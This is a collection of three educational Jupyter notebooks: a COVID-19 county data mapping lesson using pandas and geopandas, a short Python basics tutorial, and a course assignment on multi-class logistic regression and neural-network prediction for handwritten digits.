"# This code cell starts the necessary setup for Hour of CI lesson notebooks.\n# First, it enables users to hide and unhide code by producing a 'Toggle raw code' button below.\n# Second, it imports the hourofci package, which is necessary for lessons and interactive Jupyter Widgets.\n# Third, it helps hide/control other aspects of Jupyter Notebooks to improve the user experience\n# This is an initialization cell\n# It is not displayed because the Slide Type is 'Skip'\n\nfrom IPython.display import HTML, IFrame, Javascript, display\nfrom ipywidgets import interactive\nimport ipywidgets as widgets\nfrom ipywidgets import Layout\n\nimport getpass # This library allows us to get the username (User agent string)\n\n# import package for hourofci project\nimport sys\nsys.path.append('../../supplementary') # relative path (may change depending on the location of the lesson notebook)\nimport hourofci\n\n# Retreive the user agent string, it will be passed to the hourofci submit button\nagent_js = \"\"\"\nIPython.notebook.kernel.execute(\"user_agent = \" + \"'\" + navigator.userAgent + \"'\");\n\"\"\"\nJavascript(agent_js)\n\n# load javascript to initialize/hide cells, get user agent string, and hide output indicator\n# hide code by introducing a toggle button \"Toggle raw code\"\nHTML(''' \n <script type=\"text/javascript\" src=\\\"../../supplementary/js/custom.js\\\"></script>\n \n <input id=\"toggle_code\" type=\"button\" value=\"Toggle raw code\">\n''')",
"_____no_output_____"
]
],
[
[
"## Setup\nAs always, you have to import the specific Python packages you'll need. You'll learn more about these in the other lessons, so for now let's import all of the packages that we will use for the Gateway Exploration component. If you want to dig deeper, feel free to search each package to understand what it does and what it can do for you.\n\nAs before, run this code by clicking the Run button left of the code cell. \n\nWait for the code to run. This is shown by the asterisk inside the brackets of <pre>In [ ]:</pre>. When it changes to a number and the print output shows up, you're good to go. ",
"_____no_output_____"
]
],
[
[
"# Run this code by clicking the Run button on the left to import all of the packages\n\nfrom matplotlib import pyplot\nimport pandas\nimport geopandas\n\nimport os\nimport pprint\nimport IPython\nfrom shapely.geometry import Polygon\nimport numpy as np\nfrom datetime import datetime\n\nprint(\"Modules imported\")",
"_____no_output_____"
]
],
[
[
"## Download COVID-19 Data\nThis optional code cell will download the US county level data released by the New York Times that we demonstrated earlier. It's found here: https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv.\n\nThe code below gets the data from the URL and puts it into a local file called \"us-counties.csv\"\n\nSkip this step if you already downloaded this data in an earlier segment. You can always come back and re-run it if you need to.",
"_____no_output_____"
]
],
[
[
"# Run this code cell if you have not yet downloaded the Covid-19 data from the New York Times\n!wget https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv -O us-counties.csv",
"_____no_output_____"
]
],
[
[
"## Exploration 1: View, Clean, Extract, and Merge Data",
"_____no_output_____"
],
[
"### View the data\nOnce you have downloaded the data file, you should look at it to make sure it is what you want.\n\nTo do that, we'll convert the downloaded file into a format that our Python program can use. Here we're going to use the dataframe format provided by the Pandas package. \n\nRecall that dataframes can be though of as two dimensional arrays or spreadsheets.",
"_____no_output_____"
]
],
[
[
"#Read the data that we downloaded from the NYT into a dataframe\ncovid_counties = pandas.read_csv('./us-counties.csv')\n\n# And let's see what it looks like!\nprint(covid_counties)",
"_____no_output_____"
]
],
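[
[
"# Optional extra ways to peek at the data (a sketch, assuming covid_counties was read in above)\n# .head() shows just the first few rows and .dtypes shows the type of each column\nprint(covid_counties.head())\nprint(covid_counties.dtypes)",
"_____no_output_____"
]
],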
[
[
"### Clean the Data\n\nIn large data like this, there are often a few cells scattered around that may cause you problems. Cleaning data is an important and often complex step, it is one part of **data wrangling.** For now, let's just look for the most common problem - empty cells where a value is expected. These are known as null cells and if a number is expected it will show up as NaN (not a number) in your dataframe.\n\nLet's see if we can find if we have any of these in our data. \n\nSince we're going to use the \"fips\" column to group our data, we need to know that there no null cells in that column. (The \"FIPS\" code is a unique identifier for geographic places. Google it if you want to know more!)",
"_____no_output_____"
]
],
[
[
"#Are there NaN cells in the fips column?\n\ncovid_counties['fips'].isnull().values.any()",
"_____no_output_____"
],
[
"#How many null cells are in the fips column?\n\ncount_nan = covid_counties['fips'].isnull().sum()\nprint ('Count of rows with null fips codes: ' + str(count_nan))",
"_____no_output_____"
]
],
[
[
"Ah ha, we found lots of problems in our data! \n\nLet's see what these rows containing null cells look like. Here we'll make a temporary dataframe that contains the rows with null fips codes. ",
"_____no_output_____"
]
],
[
[
"covid_counties_clean = covid_counties[covid_counties['fips'].notnull()]\n\nprint(covid_counties_clean)",
"_____no_output_____"
]
],
[
[
"### Extract Data\n\nSince we have a row for each day in the dataset, we will use the **groupby** function to group _daily cases_ by _county_. Since some county names are found in more than one state, we have to group by _county_ and _state_ (as well as the fips code, to be sure). We will add them all up using the **sum** function.\n",
"_____no_output_____"
]
],
[
[
"# In our earlier segment we only looked at cases. \n# What if we also wanted to look at deaths? \n\n# Here we replaced ['cases'] with ['cases', 'deaths'] below.\n# This will group both cases and deaths by fips, county, and state values.\n\ncovid_grouped = covid_counties.groupby(['fips','county','state'])['cases', 'deaths']\n\n# Second, add up all the Covid-19 cases using sum\ncovid_total = covid_grouped.sum()\n\n#View the result, which should include the columns \"fips, county, state, cases, deaths\"\ncovid_total",
"_____no_output_____"
]
],
[
[
"Now we could apply some basic arithmetic for the rows using Pandas.\n\nLet's get the number of deaths per case for each county. This is called the Case Fatality Rather (CFR). We multiply by 100.0 to get the percentage at the end.\n\nBefore you run the code, make sure you understand that we are dividing deaths by cases for each row.",
"_____no_output_____"
]
],
[
[
"covid_total['deathpercase']=covid_total['deaths']/covid_total['cases']*100.0\n\n# Print out the new 'covid_total' dataframe with a new 'deathpercase' column\ncovid_total",
"_____no_output_____"
]
],
[
[
"Now that we have our data we can try some basic visualizations. Let's try making a scatter plot of cases on the x-axis and deaths on the y-axis.",
"_____no_output_____"
]
],
[
[
"covid_total.plot.scatter(x='cases', y='deaths')",
"_____no_output_____"
]
],
[
[
"Here are a few things you can try adding to the scatter function as parameters (remember to use commas to separate each of them).\n\n```python\n# Change the size of the dots\n# s=covid_total['deathpercase']\n# s=covid_total['deathpercase']*2\n```\n\nAnd, try a hex-bin plot.",
"_____no_output_____"
]
],
[
[
"covid_total.plot.hexbin(x='cases', y='deaths', gridsize=5)",
"_____no_output_____"
]
],
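[
[
"# A sketch of one of the suggestions above: size the dots by the case fatality rate.\n# This assumes the covid_total dataframe created in the cells above.\ncovid_total.plot.scatter(x='cases', y='deaths', s=covid_total['deathpercase']*2)",
"_____no_output_____"
]
],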
[
[
"### Merge data \nNow we'll load \"supplementary/counties_geometry.geojson\" into a geodataframe. You loaded this same file in an earlier segment on mapping Covid-19. We will (again) use **merge** to merge these two datasets into a **merged** geodataframe.",
"_____no_output_____"
]
],
[
[
"counties_geojson = geopandas.read_file(\"./supplementary/counties_geometry.geojson\")\n\n# Merge geography (counties_geojson) and covid cases and deaths (covid_total)\nmerged = pandas.merge(counties_geojson, covid_total, how='left',\n left_on=['NAME','state_name'], right_on = ['county','state'])\n\n# Let's take a quick look at our new merged geodataframe\nmerged",
"_____no_output_____"
]
],
[
[
"## 2. More Mapping\n\nNow that we have a merged dataset. We can try to create a few different maps. In this Exploration you can try to improve your first map.\n\nHere is the code from your first map. Run this code and then scroll down.",
"_____no_output_____"
]
],
[
[
"merged.plot(figsize=(15, 15), column='cases', cmap='OrRd', scheme='fisher_jenks', legend=\"true\", \n legend_kwds={'loc': 'lower left', 'title':'Number of Confirmed Cases'})\npyplot.title(\"Number of Confirmed Cases\")",
"_____no_output_____"
]
],
[
[
"Below is that code chunk again. Now you can try changing the code to improve the look of your map. There are a lot of options to change. \n\n<u>If you break something, then just copy and paste the original code above to \"reset\".</u>\n\n- *column* represents the column that is being mapped. Change what you are mapping by replacing 'cases' with 'deaths' or 'deathpercase'\n\n- *cmap* represents the colormap. You can try any number of these by replacing 'OrRd' with: 'Purples' or 'Greens' or 'gist_gray'. There are lot of choices that you can see here: https://matplotlib.org/tutorials/colors/colormaps.html. If you want to learn more about color schemes check out: https://colorbrewer2.org\n\n- *scheme* represents the scheme for creating classes. Try a few other options by replacing 'fisher_jenks' with: 'natural_breaks' or 'quantiles'\n\n- *loc* represents the location of your legend. Move your legend by replacing 'lower left' with 'upper right' or 'upper left'\n\n- *title* represents the text in the legend box. If you changed the column that you are mapping, make sure to change the title too.\n\nWant to try more? Check out here for even more options\nhttps://geopandas.org/mapping.html#choropleth-maps",
"_____no_output_____"
]
],
[
[
"merged.plot(figsize=(15, 15), column='cases', cmap='OrRd', scheme='fisher_jenks', legend=\"true\", \n legend_kwds={'loc': 'lower left', 'title':'Number of Confirmed Cases'})\npyplot.title(\"Number of Confirmed Cases\")",
"_____no_output_____"
]
],
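[
[
"# One possible variation (just a sketch, not the only answer): map the case fatality rate\n# with a different colormap and classification scheme. This assumes the merged geodataframe\n# from the cells above and, like the original map, needs the mapclassify package for schemes.\nmerged.plot(figsize=(15, 15), column='deathpercase', cmap='Purples', scheme='quantiles', legend=True,\n            legend_kwds={'loc': 'lower left', 'title': 'Deaths per 100 Confirmed Cases'})\npyplot.title('Deaths per 100 Confirmed Cases')",
"_____no_output_____"
]
],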
[
[
"# Congratulations!\n\n\n**You have finished an Hour of CI!**\n\n\nBut, before you go ... \n\n1. Please fill out a very brief questionnaire to provide feedback and help us improve the Hour of CI lessons. It is fast and your feedback is very important to let us know what you learned and how we can improve the lessons in the future.\n2. If you would like a certificate, then please type your name below and click \"Create Certificate\" and you will be presented with a PDF certificate.\n\n<font size=\"+1\"><a style=\"background-color:blue;color:white;padding:12px;margin:10px;font-weight:bold;\" href=\"https://forms.gle/JUUBm76rLB8iYppN7\">Take the questionnaire and provide feedback</a></font>\n",
"_____no_output_____"
]
],
[
[
"# This code cell loads the Interact Textbox that will ask users for their name\n# Once they click \"Create Certificate\" then it will add their name to the certificate template\n# And present them a PDF certificate\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\nfrom ipywidgets import interact\n\ndef make_cert(learner_name, lesson_name):\n cert_filename = 'hourofci_certificate.pdf'\n\n img = Image.open(\"../../supplementary/hci-certificate-template.jpg\")\n draw = ImageDraw.Draw(img)\n\n cert_font = ImageFont.truetype('../../supplementary/cruft.ttf', 150)\n cert_fontsm = ImageFont.truetype('../../supplementary/cruft.ttf', 80)\n \n w,h = cert_font.getsize(learner_name) \n draw.text( xy = (1650-w/2,1100-h/2), text = learner_name, fill=(0,0,0),font=cert_font)\n \n w,h = cert_fontsm.getsize(lesson_name)\n draw.text( xy = (1650-w/2,1100-h/2 + 750), text = lesson_name, fill=(0,0,0),font=cert_fontsm)\n \n img.save(cert_filename, \"PDF\", resolution=100.0) \n return cert_filename\n\n\ninteract_cert=interact.options(manual=True, manual_name=\"Create Certificate\")\n\n@interact_cert(name=\"Your Name\")\ndef f(name):\n print(\"Congratulations\",name)\n filename = make_cert(name, 'Gateway')\n print(\"Download your certificate by clicking the link below.\")\n \n \n \n",
"_____no_output_____"
]
],
[
[
"<font size=\"+1\"><a style=\"background-color:blue;color:white;padding:12px;margin:10px;font-weight:bold;\" href=\"hourofci_certificate.pdf?download=1\" download=\"hourofci_certificate.pdf\">Download your certificate</a></font>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
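[
"code"
],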
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
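[
"code"
],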
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
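[
"code"
],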
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb4fcbded9479a49fad424abfedb5bdadc99d992 | 6,510 | ipynb | Jupyter Notebook | _projects/project0/Jupyter-Getting-Started.ipynb | M-Sender/cmps3160 | 54546d307f913b35caa45efe6c5528dadb8055f2 | [
"MIT"
] | null | null | null | _projects/project0/Jupyter-Getting-Started.ipynb | M-Sender/cmps3160 | 54546d307f913b35caa45efe6c5528dadb8055f2 | [
"MIT"
] | null | null | null | _projects/project0/Jupyter-Getting-Started.ipynb | M-Sender/cmps3160 | 54546d307f913b35caa45efe6c5528dadb8055f2 | [
"MIT"
] | null | null | null | 25.833333 | 249 | 0.554224 | [
[
[
"# Welcome to Python!\n\nThere are many excellent Python and Jupyter/IPython tutorials out there. This Notebook contains a few snippets of code from here and there, but we suggest you go over some in-depth tutorials, especially if you are not familiar with Python. \n\nHere we borrow some material from:\n\n- [A Crash Course in Python for Scientists](http://nbviewer.ipython.org/gist/rpmuller/5920182) (which itself contains some nice links to other tutorials), \n- [matplotlib examples](http://matplotlib.org/gallery.html#),\n- [Chapter 1 from Pandas Cookbook](http://nbviewer.ipython.org/github/jvns/pandas-cookbook/tree/master/cookbook/)\n\nThis short introduction is itself written in Jupyter Notebook. See the Project 0 setup instructions to start a Jupyter server and open this notebook there.\n\nAs a starting point, you can simply type in expressions into the python shell in the browser.",
"_____no_output_____"
]
],
[
[
"8+8",
"_____no_output_____"
]
],
[
[
"Enter will continue the **cell**. If you want to execute the commands, you can either press the **play** button, or use Shift+Enter",
"_____no_output_____"
]
],
[
[
"days_of_the_week = [\"Sunday\",\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\"]\nfor day in days_of_the_week:\n statement = \"Today is \" + day\n print(statement)",
"_____no_output_____"
]
],
[
[
"The above code uses a List. In case you haven't realized this yet, Python uses \"indentation\" to decide the scope, so there is no need to enclose code within {} or similar constructs. \n\nThe other data structures in Python include Tuples and Dictionaries. Tuples are similar to Lists, but are immutable so we can't modify it (say by appending). Dictionaries are similar to Maps.",
"_____no_output_____"
]
],
[
[
"tuple1 = (1,2,'hi',9.0)\ntuple1",
"_____no_output_____"
],
[
"# The following code will give an error since we are trying to change an immutable object\ntuple1.append(7)",
"_____no_output_____"
],
[
"ages_dictionary = {\"Rick\": 46, \"Bob\": 86, \"Fred\": 21}\nprint(\"Rick's age is \",ages_dictionary[\"Rick\"])",
"_____no_output_____"
]
],
[
[
"### Functions\n\nHere we write a quick function to compute the Fibonacci sequence (remember this from Discrete Math?)",
"_____no_output_____"
]
],
[
[
"def fibonacci(sequence_length):\n \"Return the Fibonacci sequence of length *sequence_length*\"\n sequence = [0,1]\n if sequence_length < 1:\n print(\"Fibonacci sequence only defined for length 1 or greater\")\n return\n if 0 < sequence_length < 3:\n return sequence[:sequence_length]\n for i in range(2,sequence_length): \n sequence.append(sequence[i-1]+sequence[i-2])\n return sequence",
"_____no_output_____"
],
[
"help(fibonacci)",
"_____no_output_____"
],
[
"fibonacci(10)",
"_____no_output_____"
]
],
[
[
"The following function shows several interesting features, including the ability to return multiple values as a tuple, and the idea of \"tuple assignment\", where objects are unpacked into variables (the first line after for).",
"_____no_output_____"
]
],
[
[
"positions = [\n ('Bob',0.0,21.0),\n ('Cat',2.5,13.1),\n ('Dog',33.0,1.2)\n ]\ndef minmax(objects):\n minx = 1e20 # These are set to really big numbers\n miny = 1e20\n for obj in objects:\n name,x,y = obj\n if x < minx: \n minx = x\n if y < miny:\n miny = y\n return minx,miny\n\nx,y = minmax(positions)\nprint(x,y)",
"_____no_output_____"
],
[
"import bs4",
"_____no_output_____"
],
[
"import requests",
"_____no_output_____"
],
[
"bs4",
"_____no_output_____"
],
[
"requests",
"_____no_output_____"
],
[
"from bs4 import BeautifulSoup",
"_____no_output_____"
]
],
[
[
"From here you could write a script to say, scrape a webpage. We will dive more into this in a future class when we look at data scraping.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb4fcc6ee04de1ad0e7a95c3327ca18486eec131 | 232,792 | ipynb | Jupyter Notebook | assignment3 multi-class classification/assignment3.ipynb | oeyh/NN | f07b6273425df47dab81a451edba04028c303134 | [
"MIT"
] | 1 | 2018-09-09T05:01:06.000Z | 2018-09-09T05:01:06.000Z | assignment3 multi-class classification/assignment3.ipynb | oeyh/NN | f07b6273425df47dab81a451edba04028c303134 | [
"MIT"
] | 6 | 2018-08-20T05:14:41.000Z | 2018-09-09T04:58:36.000Z | assignment3 multi-class classification/assignment3.ipynb | oeyh/NN | f07b6273425df47dab81a451edba04028c303134 | [
"MIT"
] | null | null | null | 294.673418 | 73,756 | 0.923812 | [
[
[
"# Multi-class Classification and Neural Networks\n\n## 1. Multi-class Classification\nIn this exercise, we will use logistic regression and neural networks to recognize handwritten digits (from 0 to 9). \n\n### 1.1 Dataset\nThe dataset ex3data1.mat contains 5000 training examples of handwritten digits. Each training example is a 20 pixel by 20 pixel grayscale image of the digit. Each pixel is represented by a floating point number indicating the grayscale intensity at that location (value between -1 and 1). The 20 by 20 grid of pixels are flattened into a 400 long vector. Each training example is a single row in data matrix X. This results in a 5000 by 400 matrix X where every row is a training example. \n\n$$ X=\\left[\\matrix{-(x^{(1)})^T-\\\\ -(x^{(2)})^T-\\\\ \\vdots\\\\ -(x^{(m)})^T-}\\right]_{5000\\times400} $$\n\nThe other dtat in the training set is a 5000 long vector y that contains labels for the training set. Since the data was prepared for MATLAB, in which index starts from 1, digits 0-9 have been converted to 1-10. Here, we will convert it back to using 0-9 as labels. ",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\n%matplotlib inline",
"_____no_output_____"
],
[
"from scipy.io import loadmat\n\ndata = loadmat('ex3data1.mat')\n\nX = data[\"X\"] # 5000x400 np array\ny = data[\"y\"] # 5000x1 np array (2d)\ny = y.flatten() # change to (5000,) 1d array and \ny[y==10] = 0 # convert to 0-9 scale from 1-10 scale",
"_____no_output_____"
]
],
[
[
"### 1.2 Visualizing the data",
"_____no_output_____"
]
],
[
[
"def displayData(X):\n \"\"\"displays the 100 rows of digit image data stored in X in a nice grid. \n It returns the figure handle fig, ax\n \"\"\"\n \n # form the big 10 x 10 matrix containing all 100 images data\n # padding between 2 images\n pad = 1\n # initialize matrix with -1 (black)\n wholeimage = -np.ones((20*10+9, 20*10+9))\n # fill values\n for i in range(10):\n for j in range(10):\n wholeimage[j*21:j*21+20, i*21:i*21+20] = X[10*i+j, :].reshape((20, 20))\n \n fig, ax = plt.subplots(figsize=(6, 6))\n ax.imshow(wholeimage.T, cmap=plt.cm.gray, vmin=-1, vmax=1)\n ax.axis('off')\n \n return fig, ax",
"_____no_output_____"
],
[
"x = X[3200:3300, :]\n\nfig, ax = displayData(x)\nax.axis('off')",
"_____no_output_____"
],
[
"# randomly select 100 data points to display\nrand_indices = np.random.randint(0, 5000, size=100)\nsel = X[rand_indices, :]\n\n# display images\nfig, ax = displayData(sel)",
"_____no_output_____"
]
],
[
[
"### 1.3 Vectorizing Logistic Regression\nSince it's already been vectorized in assignment 2, we will just copy the functions here, just renaming it to lrCostFunction(). This includes regularization. ",
"_____no_output_____"
]
],
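[
[
"For reference, the regularized cost function and gradient that the code below implements are\n\n$$J(\\theta) = \\frac{1}{m}\\sum_{i=1}^{m}\\left[-y^{(i)}\\log\\left(h_\\theta(x^{(i)})\\right)-(1-y^{(i)})\\log\\left(1-h_\\theta(x^{(i)})\\right)\\right]+\\frac{\\lambda}{2m}\\sum_{j=1}^{n}\\theta_j^2$$\n\n$$\\frac{\\partial J}{\\partial \\theta_0} = \\frac{1}{m}\\sum_{i=1}^{m}\\left(h_\\theta(x^{(i)})-y^{(i)}\\right)x_0^{(i)}, \\qquad \\frac{\\partial J}{\\partial \\theta_j} = \\frac{1}{m}\\sum_{i=1}^{m}\\left(h_\\theta(x^{(i)})-y^{(i)}\\right)x_j^{(i)}+\\frac{\\lambda}{m}\\theta_j \\quad (j\\ge 1)$$\n\nwhere $h_\\theta(x)=g(\\theta^Tx)$ is the sigmoid hypothesis and the intercept term $\\theta_0$ is not regularized.",
"_____no_output_____"
]
],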
[
[
"def sigmoid(z):\n \"\"\"sigmoid(z) computes the sigmoid of z. z can be a number,\n vector, or matrix. \n \"\"\"\n \n g = 1 / (1 + np.exp(-z))\n \n return g",
"_____no_output_____"
],
[
"def lrCostFucntion(theta, X, y, lmd):\n \"\"\"computes the cost of using\n% theta as the parameter for regularized logistic regression and the\n% gradient of the cost w.r.t. to the parameters.\n \"\"\"\n \n m = len(y)\n \n # prepare for matrix calculations\n y = y[:, np.newaxis]\n \n # to prevent error in scipy.optimize.minimize(method='CG')\n # unroll theta first, make sure theta is (n+1) by 1 array\n theta = theta.ravel()\n theta = theta[:, np.newaxis]\n \n \n# print('theta: {}'.format(theta.shape))\n# print('X: {}'.format(X.shape))\n# print('y: {}'.format(y.shape))\n # cost\n J = ([email protected](sigmoid(X@theta)))/m - ((1-y.T)@np.log(1-sigmoid(X@theta)))/m + (theta[1:].T@theta[1:])*lmd/(2*m)\n # J = J[0, 0]\n \n # gradient\n grad = np.zeros(theta.shape)\n\n # added newaxis in order to get 2d array instead of 1d array\n grad[0] = X.T[0, np.newaxis, :]@(sigmoid(X@theta)-y)/m\n \n grad[1:] = X.T[1:, :]@(sigmoid(X@theta)-y)/m + lmd*theta[1:]/m\n \n return J, grad.flatten()",
"_____no_output_____"
],
[
"# Test lrCostFunction\ntheta_t = np.array([-2, -1, 1, 2])\nX_t = np.concatenate((np.ones((5, 1)), np.arange(1, 16).reshape((5, 3), order='F')/10), axis=1)\ny_t = np.array([1, 0, 1, 0, 1])\nlambda_t = 3\nJ, grad = lrCostFucntion(theta_t, X_t, y_t, lambda_t)",
"_____no_output_____"
],
[
"print('Cost: {:.6f}'.format(J[0, 0]))\nprint('Expected: 2.534819')\nprint('Gradients: \\n{}'.format(grad))\nprint('Expected: \\n0.146561\\n -0.548558\\n 0.724722\\n 1.398003\\n')",
"Cost: 2.534819\nExpected: 2.534819\nGradients: \n[ 0.14656137 -0.54855841 0.72472227 1.39800296]\nExpected: \n0.146561\n -0.548558\n 0.724722\n 1.398003\n\n"
]
],
[
[
"### 1.4 One-vs-all Classification\nHere, we implement one-vs-all classification by training multiple regularized logistic regression classifier, one for each of the K classes in our dataset. K=10 in this case. ",
"_____no_output_____"
]
],
[
[
"from scipy.optimize import minimize",
"_____no_output_____"
],
[
"def oneVsAll(X, y, num_class, lmd):\n \"\"\"trains num_labels logistic regression classifiers and returns each of these classifiers\n% in a matrix all_theta, where the i-th row of all_theta corresponds \n% to the classifier for label i\n \"\"\"\n \n # m is number of training samples, n is number of features + 1\n m, n = X.shape\n \n # store theta results\n all_theta = np.zeros((num_class, n))\n #print(all_theta.shape)\n \n # initial conidition, 1d array\n theta0 = np.zeros(n)\n print(theta0.shape)\n \n # train one theta at a time\n for i in range(num_class):\n \n # y should be either 0 or 1, representing true or false\n ylabel = (y==i).astype(int)\n \n # run optimization\n result = minimize(lrCostFucntion, theta0, args=(X, ylabel, lmd), method='CG', \n jac=True, options={'disp': True, 'maxiter':1000})\n # print(result)\n all_theta[i, :] = result.x\n \n return all_theta",
"_____no_output_____"
],
[
"# prepare parameters\nlmd = 0.1\nm = len(y)\nX_wb = np.concatenate((np.ones((m, 1)), X), axis=1)\nnum_class = 10 # 10 classes, digits 0 to 9\n\nprint(X_wb.shape)\nprint(y.shape)\n\n# Run training\nall_theta = oneVsAll(X_wb, y, num_class, lmd)",
"(5000, 401)\n(5000,)\n(401,)\nOptimization terminated successfully.\n Current function value: 0.008577\n Iterations: 113\n Function evaluations: 434\n Gradient evaluations: 434\nOptimization terminated successfully.\n Current function value: 0.013123\n Iterations: 104\n Function evaluations: 400\n Gradient evaluations: 400\nOptimization terminated successfully.\n Current function value: 0.050811\n Iterations: 237\n Function evaluations: 727\n Gradient evaluations: 727\nOptimization terminated successfully.\n Current function value: 0.057605\n Iterations: 250\n Function evaluations: 742\n Gradient evaluations: 742\nOptimization terminated successfully.\n Current function value: 0.033086\n Iterations: 207\n Function evaluations: 682\n Gradient evaluations: 682\nOptimization terminated successfully.\n Current function value: 0.054466\n Iterations: 253\n Function evaluations: 755\n Gradient evaluations: 755\nOptimization terminated successfully.\n Current function value: 0.018260\n Iterations: 143\n Function evaluations: 523\n Gradient evaluations: 523\nOptimization terminated successfully.\n Current function value: 0.030647\n Iterations: 199\n Function evaluations: 667\n Gradient evaluations: 667\nOptimization terminated successfully.\n Current function value: 0.078461\n Iterations: 275\n Function evaluations: 757\n Gradient evaluations: 757\nOptimization terminated successfully.\n Current function value: 0.071201\n Iterations: 296\n Function evaluations: 851\n Gradient evaluations: 851\n"
]
],
[
[
"#### One-vs-all Prediction",
"_____no_output_____"
]
],
[
[
"def predictOneVsAll(all_theta, X):\n \"\"\"will return a vector of predictions\n% for each example in the matrix X. Note that X contains the examples in\n% rows. all_theta is a matrix where the i-th row is a trained logistic\n% regression theta vector for the i-th class. You should return column vector \n% of values from 1..K (e.g., p = [1; 3; 1; 2] predicts classes 1, 3, 1, 2\n% for 4 examples)\n \"\"\"\n \n # apply np.argmax to the output matrix to find the predicted label \n # for that training sample\n out = (all_theta @ X.T).T\n #print(out[4000:4020, :])\n return np.argmax(out, axis=1)",
"_____no_output_____"
],
[
"# prediction accuracy\npred = predictOneVsAll(all_theta, X_wb)\nprint(pred.shape)\n\naccuracy = np.sum((pred==y).astype(int))/m*100\nprint('Training accuracy is {:.2f}%'.format(accuracy))",
"(5000,)\nTraining accuracy is 96.46%\n"
]
],
[
[
"## 2. Neural Networks\nIn the previous part of this exercise, you implemented multi-class logistic re-\ngression to recognize handwritten digits. However, logistic regression cannot\nform more complex hypotheses as it is only a linear classifier.3\nIn this part of the exercise, you will implement a neural network to rec-\nognize handwritten digits using the same training set as before. The neural\nnetwork will be able to represent complex models that form non-linear hy-\npotheses.\n\nFor this week, you will be using parameters from a neural network\nthat we have already trained. Your goal is to implement the feedforward\npropagation algorithm to use our weights for prediction.\n\nOur neural network is shown in Figure 2. It has 3 layers: an input layer, a\nhidden layer and an output layer. Recall that our inputs are pixel values of\ndigit images. Since the images are of size 20x20, this gives us 400 input layer\nunits (excluding the extra bias unit which always outputs +1). As before,\nthe training data will be loaded into the variables X and y.\n\nA set of pre-trained network parameters ($\\Theta_{(1)},\\Theta_{(2)}$) are provided and stored in ex3weights.mat. The neural network used contains 25 units in the 2nd layer and 10 output units (corresponding to 10 digit classes).\n\n",
"_____no_output_____"
]
],
[
[
"#from scipy.io import loadmat\n\ndata = loadmat('ex3weights.mat')\n\nTheta1 = data[\"Theta1\"] # 25x401 np array\nTheta2 = data[\"Theta2\"] # 10x26 np array (2d)\nprint(Theta1.shape, Theta2.shape)",
"(25, 401) (10, 26)\n"
]
],
[
[
"### Vectorizing the forward propagation\nMatrix dimensions:\n\n$X_wb$: 5000 x 401\n\n$\\Theta^{(1)}$: 25 x 401\n\n$\\Theta^{(2)}$: 10 x 26\n\n$a^{(2)}$: 5000 x 25 or 5000 x 26 after adding intercept terms\n\n$a^{(3)}$: 5000 x 10\n\n$$a^{(2)} = g(X_{wb}\\Theta^{(1)^T})$$\n\n$$a^{(3)} = g(a^{(2)}_{wb}\\Theta^{(2)^T})$$",
"_____no_output_____"
]
],
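In the formulas above, $g(\cdot)$ is the logistic sigmoid; the `sigmoid` helper used by `predict` below is presumably defined earlier in this notebook. As a small, self-contained sketch (the `_demo` arrays are random placeholders, only meant to verify the shapes listed above):

```python
import numpy as np

def sigmoid(z):
    # logistic function g(z) = 1 / (1 + e^(-z))
    return 1.0 / (1.0 + np.exp(-z))

# random placeholders with the dimensions listed above
X_wb_demo = np.random.randn(5000, 401)
Theta1_demo = np.random.randn(25, 401)
Theta2_demo = np.random.randn(10, 26)

a2 = sigmoid(X_wb_demo @ Theta1_demo.T)              # (5000, 25)
a2_wb = np.hstack([np.ones((a2.shape[0], 1)), a2])   # (5000, 26) after adding the bias column
a3 = sigmoid(a2_wb @ Theta2_demo.T)                  # (5000, 10)
print(a2.shape, a2_wb.shape, a3.shape)
```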
[
[
"def predict(X, Theta1, Theta2):\n \"\"\" predicts output given network parameters Theta1 and Theta2 in Theta. \n The prediction from the neural network will be the label that has the largest output.\n \"\"\"\n \n a2 = sigmoid(X @ Theta1.T)\n \n # add intercept terms to a2\n m, n = a2.shape\n a2_wb = np.concatenate((np.ones((m, 1)), a2), axis=1)\n \n a3 = sigmoid(a2_wb @ Theta2.T)\n# print(a3[:10, :])\n \n # apply np.argmax to the output matrix to find the predicted label \n # for that training sample\n # correct for indexing difference between MATLAB and Python\n p = np.argmax(a3, axis=1) + 1\n p[p==10] = 0\n\n return p # this is a 1d array",
"_____no_output_____"
],
[
"# prediction accuracy\npred = predict(X_wb, Theta1, Theta2)\nprint(pred.shape)\n\n\naccuracy = np.sum((pred==y).astype(int))/m*100\nprint('Training accuracy is {:.2f}%'.format(accuracy))",
"(5000,)\nTraining accuracy is 97.52%\n"
],
[
"\n# randomly show 10 images and corresponding results\n# randomly select 10 data points to display\nrand_indices = np.random.randint(0, 5000, size=10)\nsel = X[rand_indices, :]\n\nfor i in range(10):\n \n # Display predicted digit\n print(\"Predicted {} for this image: \".format(pred[rand_indices[i]]))\n \n # display image\n fig, ax = plt.subplots(figsize=(2, 2))\n ax.imshow(sel[i, :].reshape(20, 20).T, cmap=plt.cm.gray, vmin=-1, vmax=1)\n ax.axis('off')\n plt.show()",
